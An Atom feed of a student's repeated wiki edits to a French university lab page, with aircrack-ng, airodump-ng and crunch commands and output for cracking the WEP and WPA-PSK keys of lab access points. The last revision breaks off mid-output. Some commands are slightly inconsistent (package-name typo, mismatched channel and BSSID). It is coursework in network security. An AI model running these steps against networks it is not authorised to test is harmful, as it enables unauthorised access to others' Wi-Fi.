<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Nerceau</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Nerceau"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Nerceau"/>
		<updated>2026-05-12T20:09:19Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56566</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56566"/>
				<updated>2021-11-29T12:44:03Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
=='''Tests d’intrusion'''==&lt;br /&gt;
====Cassage de clef WEP d’un point d’accès WiFi====&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
====Cassage de clef WPA-PSK d’un point d’accès WiFi====&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.&lt;br /&gt;
&lt;br /&gt;
On va stocker environ 10000 trames passants par la kracotte dans un fichier &amp;quot;kracotte.txt&amp;quot; avec la commande suivante :&lt;br /&gt;
    airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon&lt;br /&gt;
&lt;br /&gt;
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :&lt;br /&gt;
    crunch 8 8 0123456789 &amp;gt;&amp;gt; Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :&lt;br /&gt;
    split -b 200m Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :&lt;br /&gt;
    aircrack-ng -w xaa Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xab Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xac Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xad Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xae Dico_krakotte13.txt-13.cap&lt;br /&gt;
&lt;br /&gt;
Puis on obtient le mot de passe craqué :&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.5.2&lt;br /&gt;
    [08:04:01] 66637843/102795810 keys tested (958.44 k/s)&lt;br /&gt;
    Time left: 10 hours, 29 minutes, 3 seconds                64.83%&lt;br /&gt;
                         KEY FOUND! [ 66601666 ]&lt;br /&gt;
    Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 &lt;br /&gt;
                     18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5&lt;br /&gt;
    Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 &lt;br /&gt;
                     59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 &lt;br /&gt;
                     B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 &lt;br /&gt;
                     18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5&lt;br /&gt;
    EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56565</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56565"/>
				<updated>2021-11-29T12:43:52Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
=='''Tests d’intrusion'''==&lt;br /&gt;
====Cassage de clef WEP d’un point d’accès WiFi====&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
====Cassage de clef WPA-PSK d’un point d’accès WiFi====&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.&lt;br /&gt;
&lt;br /&gt;
On va stocker environ 10000 trames passants par la kracotte dans un fichier &amp;quot;kracotte.txt&amp;quot; avec la commande suivante :&lt;br /&gt;
    airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon&lt;br /&gt;
&lt;br /&gt;
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :&lt;br /&gt;
    crunch 8 8 0123456789 &amp;gt;&amp;gt; Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :&lt;br /&gt;
    split -b 200m Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :&lt;br /&gt;
    aircrack-ng -w xaa Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xab Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xac Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xad Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xae Dico_krakotte13.txt-13.cap&lt;br /&gt;
&lt;br /&gt;
Puis on obtient le mot de passe craqué :&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.5.2&lt;br /&gt;
    [08:04:01] 66637843/102795810 keys tested (958.44 k/s)&lt;br /&gt;
    Time left: 10 hours, 29 minutes, 3 seconds                64.83%&lt;br /&gt;
                         KEY FOUND! [ 66601666 ]&lt;br /&gt;
    Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 &lt;br /&gt;
                     18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5&lt;br /&gt;
    Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 &lt;br /&gt;
                     59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 &lt;br /&gt;
                     B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 &lt;br /&gt;
                     18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5&lt;br /&gt;
    EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10&lt;br /&gt;
&lt;br /&gt;
=='''Tests d’intrusion'''==&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56564</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56564"/>
				<updated>2021-11-29T12:43:16Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Tests d’intrusion==&lt;br /&gt;
====Cassage de clef WEP d’un point d’accès WiFi====&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===='''Cassage de clef WPA-PSK d’un point d’accès WiFi'''====&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.&lt;br /&gt;
&lt;br /&gt;
On va stocker environ 10000 trames passants par la kracotte dans un fichier &amp;quot;kracotte.txt&amp;quot; avec la commande suivante :&lt;br /&gt;
    airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon&lt;br /&gt;
&lt;br /&gt;
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :&lt;br /&gt;
    crunch 8 8 0123456789 &amp;gt;&amp;gt; Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :&lt;br /&gt;
    split -b 200m Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :&lt;br /&gt;
    aircrack-ng -w xaa Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xab Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xac Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xad Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xae Dico_krakotte13.txt-13.cap&lt;br /&gt;
&lt;br /&gt;
Puis on obtient le mot de passe craqué :&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.5.2&lt;br /&gt;
    [08:04:01] 66637843/102795810 keys tested (958.44 k/s)&lt;br /&gt;
    Time left: 10 hours, 29 minutes, 3 seconds                64.83%&lt;br /&gt;
                         KEY FOUND! [ 66601666 ]&lt;br /&gt;
    Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 &lt;br /&gt;
                     18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5&lt;br /&gt;
    Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 &lt;br /&gt;
                     59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 &lt;br /&gt;
                     B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 &lt;br /&gt;
                     18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5&lt;br /&gt;
    EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10&lt;br /&gt;
&lt;br /&gt;
== '''Tests d’intrusion''' ==&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56563</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56563"/>
				<updated>2021-11-29T12:42:57Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''Tests d’intrusion''' ==&lt;br /&gt;
===='''Cassage de clef WEP d’un point d’accès WiFi'''====&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
